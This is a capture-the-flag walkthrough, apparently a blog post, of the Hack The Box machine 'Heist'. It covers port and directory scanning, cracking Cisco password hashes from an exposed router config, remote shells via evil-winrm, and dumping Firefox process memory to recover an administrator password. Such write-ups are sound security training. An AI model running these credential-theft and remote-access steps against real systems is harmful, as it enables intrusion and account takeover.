Pages

Search

HTB Heist

$nmap -sC -sV -oA all -vv -p- 10.10.10.149

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 16:48 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
Initiating Ping Scan at 16:48
Scanning 10.10.10.149 [2 ports]
Completed Ping Scan at 16:48, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:48
Completed Parallel DNS resolution of 1 host. at 16:48, 0.01s elapsed
Initiating Connect Scan at 16:48
Scanning 10.10.10.149 [65535 ports]
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Increasing send delay for 10.10.10.149 from 0 to 5 due to 20 out of 66 dropped probes since last increase.
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Discovered open port 5985/tcp on 10.10.10.149
Connect Scan Timing: About 92.95% done; ETC: 16:58 (0:00:43 remaining)
Completed Connect Scan at 16:58, 617.22s elapsed (65535 total ports)
Initiating Service scan at 16:58
Scanning 5 services on 10.10.10.149
Stats: 0:11:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 16:59 (0:00:11 remaining)
Completed Service scan at 16:59, 55.37s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:59
NSE Timing: About 99.85% done; ETC: 16:59 (0:00:00 remaining)
Completed NSE at 17:00, 40.63s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.66s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Nmap scan report for 10.10.10.149
Host is up, received syn-ack (0.070s latency).
Scanned at 2020-12-16 16:48:11 CET for 714s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 54667/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 28163/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-16T15:59:26
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 714.41 seconds

$gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.149
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/16 22:25:14 Starting gobuster
===============================================================
http://10.10.10.149/images (Status: 301)
http://10.10.10.149/js (Status: 301)
http://10.10.10.149/css (Status: 301)
http://10.10.10.149/Images (Status: 301)
http://10.10.10.149/attachments (Status: 301)
http://10.10.10.149/CSS (Status: 301)
http://10.10.10.149/JS (Status: 301)
http://10.10.10.149/Js (Status: 301)
http://10.10.10.149/Css (Status: 301)
http://10.10.10.149/IMAGES (Status: 301)
http://10.10.10.149/Attachments (Status: 301)
[ERROR] 2020/12/16 22:27:36 [!] parse http://10.10.10.149/error_log: net/url: invalid control character in URL

$gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.149
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Discovery/Web-Content/raft-large-files.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/16 22:40:49 Starting gobuster
===============================================================
http://10.10.10.149/index.php (Status: 302)
http://10.10.10.149/login.php (Status: 200)
http://10.10.10.149/. (Status: 302)
http://10.10.10.149/errorpage.php (Status: 200)
http://10.10.10.149/Login.php (Status: 200)
http://10.10.10.149/Index.php (Status: 302)
[ERROR] 2020/12/16 22:43:15 [!] parse http://10.10.10.149/directory             e.g.: net/url: invalid control character in URL
http://10.10.10.149/index.Php (Status: 302)
===============================================================
2020/12/16 22:44:18 Finished
===============================================================

Accessing to http://10.10.10.149/login.php

There is a «Login as Guest» option.

http://10.10.10.149/issues.php

There is an «Attachment» link.

http://10.10.10.149/attachments/config.txt

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
  • The message talks about a Cisco Router.
  • Hazard said to create a user account for him.
  • So it should be a «hazard» username.
  • Testing admin credentials we’ve just found.
  • we need an email address
  • In this file, there are 2 passwords hashes of the Cisco Router.

Searching about Cisco passwords types we can see:

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

Using an online tool we can crack these type 7 passwords:

https://www.ifm.net.nz/cookbooks/passwordcracker.html

So,

username = rout3r
password = $uperP@ssword

and

username = admin 
password = Q4)sJu\Y8qz*A3?d

There is another password, a type 5.

nanotype5.hashcat type5.hash

$1$pdQG$o8nrSzsGXeaduXrjlvKc91

$john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt type5.hash

Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:01:25 DONE (2020-12-17 10:21) 0.01168g/s 40950p/s 40950c/s 40950C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$john --format=md5crypt type5.hash --show

?:stealth1agent

1 password hash cracked, 0 left

So the type 5 password is stealth1agent.

More information on Cisco Passwords can be found here:

https://www.cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dial-user-service-radius/107614-64.html

https://community.cisco.com/t5/networking-documents/understanding-the-differences-between-the-cisco-password-secret/ta-p/3163238

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.

CME can be used to brute force the credentials to be used on SMB.
(https://github.com/byt3bl33d3r/CrackMapExec)

Installation:

$python3 -m pip install pipx

Collecting pipx
  Downloading pipx-0.15.6.0-py3-none-any.whl (43 kB)
     |████████████████████████████████| 43 kB 925 kB/s 
Requirement already satisfied: packaging>=20.0 in /usr/lib/python3/dist-packages (from pipx) (20.4)
Collecting userpath>=1.4.1
  Downloading userpath-1.4.1-py2.py3-none-any.whl (14 kB)
Collecting argcomplete<2.0,>=1.9.4
  Downloading argcomplete-1.12.2-py2.py3-none-any.whl (38 kB)
Requirement already satisfied: click in /usr/lib/python3/dist-packages (from userpath>=1.4.1->pipx) (7.1.2)
Requirement already satisfied: distro; platform_system == "Linux" in /usr/lib/python3/dist-packages (from userpath>=1.4.1->pipx) (1.5.0)
Installing collected packages: userpath, argcomplete, pipx
Successfully installed argcomplete-1.12.2 pipx-0.15.6.0 userpath-1.4.1

$pipx ensurepath

/home/ruben/.local/bin is already in PATH.

All pipx binary directories have been added to PATH. If you are sure
you want to proceed, try again with the '--force' flag.

Otherwise pipx is ready to go! ✨ 🌟 ✨

$pipx install crackmapexec

The virtual environment was not created successfully because ensurepip is not
available.  On Debian/Ubuntu systems, you need to install the python3-venv
package using the following command.

    apt-get install python3-venv

You may need to use sudo with that command.  After installing the python3-venv
package, recreate your virtual environment.

Failing command: ['/home/ruben/.local/pipx/shared/bin/python3', '-Im', 'ensurepip', '--upgrade', '--default-pip']

'/usr/bin/python3 -m venv --clear /home/ruben/.local/pipx/shared' failed

$sudo apt-get install python3-venv

[sudo] password for ruben: 
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  dcraw flac libdbd-sqlite3-perl libgvm11 libhtml-linkextractor-perl libisl22 libjpeg-turbo-progs liblwp-protocol-socks-perl libndpi2.6 libout123-0 libperl5.30 libpython3.8 libpython3.8-dev
  libre2-8 librecode0 libstd-rust-1.47 libsyn123-0 libturbojpeg0 libxcb-util0 libxenmisc4.11 mpg123 php-sqlite3 php7.4-sqlite3 python3.8-dev recode
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes adicionales:
  python3.9-venv
Se instalarán los siguientes paquetes NUEVOS:
  python3-venv python3.9-venv
0 actualizados, 2 nuevos se instalarán, 0 para eliminar y 1 no actualizados.
Se necesita descargar 6.500 B de archivos.
Se utilizarán 33,8 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 https://ftp.halifax.rwth-aachen.de/parrotsec rolling/main amd64 python3.9-venv amd64 3.9.0-5 [5.392 B]
Des:2 https://ftp-stud.hs-esslingen.de/Mirrors/archive.parrotsec.org rolling/main amd64 python3-venv amd64 3.9.0-4 [1.108 B]
Descargados 6.500 B en 1s (6.238 B/s)      
Seleccionando el paquete python3.9-venv previamente no seleccionado.
(Leyendo la base de datos ... 514062 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../python3.9-venv_3.9.0-5_amd64.deb ...
Desempaquetando python3.9-venv (3.9.0-5) ...
Seleccionando el paquete python3-venv previamente no seleccionado.
Preparando para desempaquetar .../python3-venv_3.9.0-4_amd64.deb ...
Desempaquetando python3-venv (3.9.0-4) ...
Configurando python3.9-venv (3.9.0-5) ...
Configurando python3-venv (3.9.0-4) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated

$pipx install crackmapexec

⚠️  Note: cmedb was already on your PATH at /usr/bin/cmedb
⚠️  Note: crackmapexec was already on your PATH at /usr/bin/crackmapexec
  installed package crackmapexec 5.1.1, Python 3.9.0+
  These apps are now globally available
    - cme
    - cmedb
    - crackmapexec
done! ✨ 🌟 ✨

CrackMapExec documentation: 

https://mpgn.gitbook.io/crackmapexec/

We can use evil-winrm to obtain a shell.

$evil-winrm -i 10.10.10.149 -u Chase -p

"Q4)sJu\Y8qz*A3?d" 

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

Evil-WinRM PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

Evil-WinRM PS C:\Users\Chase\Desktop> type user.txt

a127XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Evil-WinRM PS C:\Users\Chase\Desktop> type todo.txt

Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

$evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

Evil-WinRM PS C:\Users\Chase\Documents> hostname

SupportDesk

Evil-WinRM PS C:\Users\Chase\Documents> whoami

supportdesk\chase

Evil-WinRM PS C:\Users\Chase\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chase                    DefaultAccount
Guest                    Hazard                   Jason
support                  WDAGUtilityAccount
The command completed with one or more errors.

Evil-WinRM PS C:\Users\Chase\Documents> net user Chase

User name                    Chase
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/22/2019 8:20:32 AM
Password expires             Never
Password changeable          4/22/2019 8:20:32 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2020 4:43:58 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> net user Hazard

User name                    Hazard
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/21/2019 5:15:19 PM
Password expires             Never
Password changeable          4/21/2019 5:15:19 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2020 4:44:15 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> net user

Jason
User name                    Jason
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/21/2019 5:18:29 PM
Password expires             Never
Password changeable          4/21/2019 5:18:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> netstat -ano

 Active Connections

Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1084
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1472
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2552
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       648
  TCP    10.10.10.149:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.149:5985      10.10.14.12:36196      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36200      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36204      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36208      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36210      ESTABLISHED     4
  TCP    127.0.0.1:49672        127.0.0.1:49673        ESTABLISHED     6712
  TCP    127.0.0.1:49673        127.0.0.1:49672        ESTABLISHED     6712
  TCP    127.0.0.1:49674        127.0.0.1:49675        ESTABLISHED     7096
  TCP    127.0.0.1:49675        127.0.0.1:49674        ESTABLISHED     7096
  TCP    127.0.0.1:49677        127.0.0.1:49678        ESTABLISHED     4900
  TCP    127.0.0.1:49678        127.0.0.1:49677        ESTABLISHED     4900
  TCP    127.0.0.1:49680        127.0.0.1:49681        ESTABLISHED     6628
  TCP    127.0.0.1:49681        127.0.0.1:49680        ESTABLISHED     6628
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       924
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       484
  TCP    [::]:49665             [::]:0                 LISTENING       1084
  TCP    [::]:49666             [::]:0                 LISTENING       1472
  TCP    [::]:49667             [::]:0                 LISTENING       2552
  TCP    [::]:49668             [::]:0                 LISTENING       632
  TCP    [::]:49669             [::]:0                 LISTENING       648
  UDP    0.0.0.0:123            *:*                                    2844
  UDP    0.0.0.0:500            *:*                                    2736
  UDP    0.0.0.0:4500           *:*                                    2736
  UDP    0.0.0.0:5353           *:*                                    1572
  UDP    0.0.0.0:5355           *:*                                    1572
  UDP    0.0.0.0:56571          *:*                                    1572
  UDP    0.0.0.0:59029          *:*                                    1572
  UDP    10.10.10.149:137       *:*                                    4
  UDP    10.10.10.149:138       *:*                                    4
  UDP    127.0.0.1:54798        *:*                                    3000
  UDP    [::]:123               *:*                                    2844
  UDP    [::]:500               *:*                                    2736
  UDP    [::]:4500              *:*                                    2736
  UDP    [::]:5353              *:*                                    1572
  UDP    [::]:5355              *:*                                    1572
  UDP    [::]:56571             *:*                                    1572
  UDP    [::]:59029             *:*                                    1572

Evil-WinRM PS C:\Users\Chase\Documents> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    475      18     2300       5448               408   0 csrss
    296      17     2392       5340               504   1 csrss
    358      15     3532      14160              5436   1 ctfmon
    255      14     3980      13452              3968   0 dllhost
    166       9     1840       9796       0.17   5228   1 dllhost
    620      35    33732      60308                72   1 dwm
   1489      58    23932      78868              5656   1 explorer
    390      40   114248     145892      51.83   4900   1 firefox
    358      26    16436      37568       0.53   6628   1 firefox
   1156      77   177968     220196      34.91   6712   1 firefox
    345      20    10620      38576       0.44   6836   1 firefox
    407      31    16948      62704       2.52   7096   1 firefox
     49       6     1800       4680               824   1 fontdrvhost
     49       6     1440       3680               832   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    997      24     6316      15580               648   0 lsass
    227      13     3088      10296              4276   0 msdtc
    566      61   131096     124756              2944   0 MsMpEng
      0      13      340      74032               104   0 Registry
    274      14     3132      15332               420   1 RuntimeBroker
    145       8     1644       7308              2252   1 RuntimeBroker
    316      17    19844      32236              4848   1 RuntimeBroker
    675      32    19756      62012              1964   1 SearchUI
    540      11     5424       9996               632   0 services
    716      30    15532      51068              6072   1 ShellExperienceHost
    438      17     4924      23532              4944   1 sihost
     53       3      528       1224               328   0 smss
    475      23     5832      16324              2552   0 spoolsv
    285      13     4112      11344               364   0 svchost
    115       7     1240       5272               372   0 svchost
    203      12     2088       9588               396   0 svchost
    359      22    16352      18460               496   0 svchost
    149       9     1740      11524               716   0 svchost
     85       5      892       3904               776   0 svchost
    860      21     7304      22536               800   0 svchost
    163       9     3184       7736               916   0 svchost
    860      16     5404      11944               924   0 svchost
    253      10     2056       7748               968   0 svchost
    386      13    12128      15544              1084   0 svchost
    121      15     3560       7600              1184   0 svchost
    140       7     1328       5712              1192   0 svchost
    188       9     1816       7480              1240   0 svchost
    214       9     2276       7592              1268   0 svchost
    232      12     2500      11176              1320   0 svchost
    156       7     1200       5604              1336   0 svchost
    433       9     3000       9108              1348   0 svchost
    345      16     4180      11432              1452   0 svchost
    381      18     5568      14524              1472   0 svchost
    171      11     1800       7900              1492   0 svchost
    302      13     2004       8676              1564   0 svchost
    239      14     3236       8528              1572   0 svchost
    321      10     2652       8468              1664   0 svchost
    193      12     2188      12028              1672   0 svchost
    163      10     1904       6796              1780   0 svchost
    159       9     2244       7468              1896   0 svchost
    227      11     2836      10920              1904   0 svchost
    402      32     8812      16948              1928   0 svchost
    198      11     2004       8092              1984   0 svchost
    239      11     2588       9936              2020   0 svchost
    417      19    15096      32152              2220   0 svchost
    166      12     3940      10760              2624   0 svchost
    235      25     3352      12520              2640   0 svchost
    469      20    13360      28156              2648   0 svchost
    374      15    12404      21712              2680   0 svchost
    137       9     1640       6584              2712   0 svchost
    140       8     1528       6172              2728   0 svchost
    265      13     2588       7908              2736   0 svchost
    126       7     1216       5368              2768   0 svchost
    208      11     2412       8468              2796   0 svchost
    213      12     1864       7468              2844   0 svchost
    233      14     4652      11836              2876   0 svchost
    466      18     3344      11792              3000   0 svchost
    169      10     2172      13252              3008   0 svchost
    274      22     4032      12916              3020   0 svchost
    386      23     3432      12336              3256   0 svchost
    209      15     6352      10568              4516   0 svchost
    366      18     5700      26372              4644   1 svchost
    233      12     3080      13516              4824   1 svchost
    206      11     2996      11992              5180   0 svchost
    161       9     4700      12116              5344   0 svchost
    175       9     1496       7276              5384   0 svchost
    251      14     3184      13684              5476   0 svchost
    308      20     9292      15128              5496   0 svchost
    128       7     1264       5704              6636   0 svchost
    251      13     3440      12640              6800   0 svchost
    168      11     2500      13208              7036   0 svchost
   1933       0      192        156                 4   0 System
    211      21     4696      13492              5080   1 taskhostw
    298      18     5188      15976              6304   1 taskhostw
    178      12     3204      10400              2788   0 VGAuthService
    384      22     9904      22708              2812   0 vmtoolsd
    245      18     3920      15072              6404   1 vmtoolsd
    175      11     1500       7000               484   0 wininit
    286      13     2736      12864               560   1 winlogon
    347      16    10916      20036              2764   0 WmiPrvSE
    707      27    77860      96360       2.20   4112   0 wsmprovhost

Listing running processes we can see several Firefox processes running.

Due to the fact the text note said to check often the issue list and it was a website, Chase may have Firefox opened to check the issues.

We can dump Firefox process with Procdump.
(https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)

Download the program and upload it to the box.

Evil-WinRM PS C:\Users\Chase\Documents> upload Procdump/procdump64.exe

Info: Uploading Procdump/procdump64.exe to C:\Users\Chase\Documents\procdump64.exe
Data: 513184 bytes of 513184 bytes copied
Info: Upload successful!

Evil-WinRM PS C:\Users\Chase\Documents> ./procdump64.exe 4900

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[20:55:16] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_201217_205516.dmp
[20:55:16] Dump 1 complete: 3 MB written in 0.2 seconds
[20:55:17] Dump count reached.

We can also use string to check the content of the file.
https://docs.microsoft.com/en-us/sysinternals/downloads/strings

Evil-WinRM PS C:\Users\Chase\Documents> dir

Directory: C:\Users\Chase\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/17/2020   8:55 PM        2463710 firefox.exe_201217_205516.dmp
-a----       12/17/2020   8:54 PM         384888 procdump64.exe
-a----       12/17/2020   8:55 PM         448888 strings64.exe
-a----       12/17/2020   5:08 PM          35107 winPEAS.bat

Evil-WinRM PS C:\Users\Chase\Documents> ./strings64.exe firefox.exe_201217_205516.dmp

Analyzing the results we obtain:

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Chase\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=SUPPORTDESK
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Windows\system32
LOCALAPPDATA=C:\Users\Chase\AppData\Local
MOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports
MOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\events
MOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending Pings
MOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exe
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini
NUMBER_OF_PROCESSORS=4
OS=Windows_NT
Path=C:\Program Files\PHP\v7.3;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
PROCESSOR_LEVEL=23
PROCESSOR_REVISION=0102
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Chase\AppData\LocalLow\Mozilla\Temp-{2bfdbb49-297a-4ae0-b21c-091a5f5d9a81}
TMP=C:\Users\Chase\AppData\LocalLow\Mozilla\Temp-{2bfdbb49-297a-4ae0-b21c-091a5f5d9a81}
USERDOMAIN=SUPPORTDESK
USERNAME=Chase
USERPROFILE=C:\Users\Chase
windir=C:\Windows
__PSLockdownPolicy=1
pjA
\\.\DISPLAY1
C:\Windows\SYSTEM32\mscms.dll

MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Here there is a web request:

localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

From here:

  • login_username = admin@support.htb
  • login_password = 4dD!5}x/re8]FBuZ

Accessing again to http://10.10.10.149/login.php

and now use credentials we’ve just found:

Access to http://10.10.10.149/issues.php

$evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Evil-WinRM PS C:\Users\Administrator\Documents> whoami

supportdesk\administrator

Evil-WinRM PS C:\Users\Administrator\Documents> cd ..
Evil-WinRM PS C:\Users\Administrator> cd Desktop

Evil-WinRM PS C:\Users\Administrator\Desktop> type root.txt

50dfXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *